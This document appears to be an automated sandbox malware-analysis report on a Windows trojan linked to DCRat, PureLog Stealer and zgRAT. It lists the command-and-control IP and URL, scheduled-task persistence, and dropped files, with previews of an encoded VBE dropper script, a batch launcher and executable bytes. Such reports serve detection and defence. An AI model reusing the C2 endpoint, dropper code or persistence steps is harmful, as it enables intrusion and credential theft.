                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://193.3.168.50kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003D00000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000036DD000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drfalse
                                                            		high
                                                            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.comkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icokahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                                  		high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                                            		high
                                                                            http://crl.ver)svchost.exe, 00000012.00000002.2910150411.00000181EF800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatakahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.carterandcone.comlkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ac.ecosia.org/autocomplete?q=kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.founder.com.cn/cnkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.jiyu-kobo.co.jp/kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.fontbureau.com/designers8kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          193.3.168.50
                                                                                          		unknownDenmark
                                                                                          		2107ARNES-NETAcademicandResearchNetworkofSloveniaSItrue

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1569008
                                                                                          Start date and time:2024-12-05 10:52:06 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 54s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:23
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:file.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@25/44@0/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:Failed
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target kahKUDRlEYHfKIalWlM.exe, PID 7264 because it is empty
                                                                                          • Execution Graph export aborted for target kahKUDRlEYHfKIalWlM.exe, PID 7644 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7972 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: file.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          04:53:09API Interceptor19x Sleep call for process: powershell.exe modified
                                                                                          04:53:16API Interceptor958070x Sleep call for process: kahKUDRlEYHfKIalWlM.exe modified
                                                                                          04:53:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                          09:53:09Task SchedulerRun new task: kahKUDRlEYHfKIalWlM path: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
                                                                                          09:53:10Task SchedulerRun new task: kahKUDRlEYHfKIalWlMk path: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          193.3.168.50file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                              Domains

                                                                                              No context

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ARNES-NETAcademicandResearchNetworkofSloveniaSIfile.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 193.3.168.50
                                                                                              file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 193.3.168.50
                                                                                              botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 193.2.192.103
                                                                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                              • 88.200.25.137
                                                                                              arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 178.172.103.122
                                                                                              pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                              • 149.62.81.228
                                                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 193.2.209.204
                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                              • 109.127.207.201
                                                                                              loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                              • 194.249.219.228
                                                                                              loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 194.249.74.121

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\Desktop\GYwcCMoE.logfile.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  hjgesadfseawd.exeGet hashmaliciousDCRatBrowse
                                                                                                    lfcdgbuksf.exeGet hashmaliciousDCRatBrowse
                                                                                                      kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                                                                        adjthjawdth.exeGet hashmaliciousDCRatBrowse
                                                                                                          qNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                                                                                                              based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):76
                                                                                                                  Entropy (8bit):4.66715165176704
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:AI18oYydpeKHAXPlmXQlOKfb49kq:trf6KglmXQ4b9kq
                                                                                                                  MD5:F64211E9D1EC38EDE33666033382D99C
                                                                                                                  SHA1:B602450C1B9D00043F20DCB60537E8706FCAD872
                                                                                                                  SHA-256:6E4D045D43E97C5FCA3DDC26016DB1F1C73B334C6FE4CEE92B65974C745A9CCA
                                                                                                                  SHA-512:1E80F74C7A6582AC8187BB22DD70FA38E8D18840D4A45D27098C6EB517228B836218211418B147FC0060CC7029AE12D6ABD0D6348B731169B93C9062876C677D
                                                                                                                  Malicious:false
                                                                                                                  Preview:%QtUm%%JmqJp%..%WxL%"C:\MsContainer/chainportruntimeCrtMonitor.exe"%fmNwnup%

                                                                                                                  C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):212
                                                                                                                  Entropy (8bit):5.775012186923779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:GUwqK+NkLzWbH1xdyrFnBaORbM5nCkDaj/4JqWLz9:GlMCzWL1xdyhBaORbQCwSQJpLp
                                                                                                                  MD5:CCC3DE297113F78D2B92B26BF192FCE3
                                                                                                                  SHA1:417DCFBA717CE68EBD96B71A2EDAC15F93E91AAE
                                                                                                                  SHA-256:2E776534DAB440E19BDA0F46B1BD2A21F2F9C2DEE1C225632F87907939516D37
                                                                                                                  SHA-512:F4C1AEFDDFCC7A9EB3FE5F333AD287FC0F4353C475EAD34890FFC1609605CE1544BBE0EE4A7192B856AF7540A5D1FCDFE9649856C3A04150C6EDC709B1BB6459
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:#@~^uwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFq!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z\kZKxYmk.nDJz!CVtjP`/r8$;W0*Hp++q.~R8lOEBPT~,Wl^/nYToAAA==^#~@.

                                                                                                                  C:\MsContainer\chainportruntimeCrtMonitor.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2009600
                                                                                                                  Entropy (8bit):7.5678452559926175
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:Z1ijXQywiXW604Jjh42gv9Gk2AWDpL5ml:Z1IZXWCJjhZgHW1N4
                                                                                                                  MD5:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  SHA1:0D9CE3815F04C401561339B056C7AB2BA907E16C
                                                                                                                  SHA-256:92C34270DF9842C931AB9E4AF87A0CBDD1F3B12E70482D474C3A9D0029F09ADD
                                                                                                                  SHA-512:C7516E29A99FC053D07DA626BDCE8AB37917267DE2911685DEBD3E0764819B3A387626D98413EC62808789E28E15739E0B533A9C8AB765215506BDF6AD5EF707
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ............@.....................................K.......p............................................................................ ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H.......|...........l...|...x............................................0..........(.... ........8........E....)...*...N.......8$...(.... ....~....{....:....& ....8....*(.... ....~....{o...:....& ....8....(.... ....~....{e...9....& ....8y......0..U....... ........8........E........5...m.......)...I.......8....8*... ....~....{....:....& ....8....r...ps....z*...... ........8....8.... ....~....{....:}...& ....8r...~....(@... .... .... ....s....~....(D....... ....~....{....92...

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):1.3073444247601114
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrS:KooCEYhgYEL0In
                                                                                                                  MD5:A6BBC3ECCF86B784614349F032E455A8
                                                                                                                  SHA1:EF03AB930DB0882B44E8751D31DFD112F2C26810
                                                                                                                  SHA-256:A81ECD6D7FB124FA08D91ABEF5E71FF3C71E682047FA2EE6FD7B4D1DB7E60666
                                                                                                                  SHA-512:0793CEACB6274027F488DBA8187C2A0C9DD9DFF6EC9CA32AC9D200481A7300A83C781A0EE4514FF6C4E68CA5AF41272139A95C2A1A6307635A9E0AFDA8313898
                                                                                                                  Malicious:false
                                                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xac1cf448, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.42210140213061104
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                                  MD5:9D5FED7ECDBAC6662766D68B46024E36
                                                                                                                  SHA1:5ABFA6076B45E8991C7EEDF350398CD53708030D
                                                                                                                  SHA-256:6366BE89F0E1CFA8C1398934C8A898700A7C67FE4A7FD045158645ED3230DD5D
                                                                                                                  SHA-512:547D171CE40AFCB6DFBB186C3394D09247348A975C0ABD597C25595262C3D4EE50CABA237FF8254F6C162DC91E09F7C831FAF6D510B6AA59A7ABC95F0809896B
                                                                                                                  Malicious:false
                                                                                                                  Preview:...H... .......A.......X\...;...{......................0.!..........{A..5...|o.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................ntx.5...|..................H.r,.5...|o..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16384
                                                                                                                  Entropy (8bit):0.07576490241172268
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:SmltEYeA54KPhvCjn13a/25+p0XlAllcVO/lnlZMxZNQl:SmUzm4KPha53q25V1AOewk
                                                                                                                  MD5:5D81E952F3ED47057783EF34A59FE71E
                                                                                                                  SHA1:DA89514A6A365BB64725D8A9884BC954F64C606B
                                                                                                                  SHA-256:1C962C52AFC907BBD8FF7952580AEF17A4008CC43380EC2B97153AA9C2B9AF78
                                                                                                                  SHA-512:1BE8CBDF6A3E1D7C5EB373889577CA12F89216DA3C5AAE487053A6F3F1547DCA6008E278A6F235AB74FEDCCC8B0647A7519B1E3C53D863B284CA193020420598
                                                                                                                  Malicious:false
                                                                                                                  Preview:{........................................;...{...5...|o......{A..............{A......{A..........{A]................H.r,.5...|o.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainportruntimeCrtMonitor.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1396
                                                                                                                  Entropy (8bit):5.350961817021757
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\kahKUDRlEYHfKIalWlM.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                  MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                  SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                  SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                  SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e................................................@..........

                                                                                                                  C:\Users\user\AppData\Local\Temp\16mWndxpi3

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
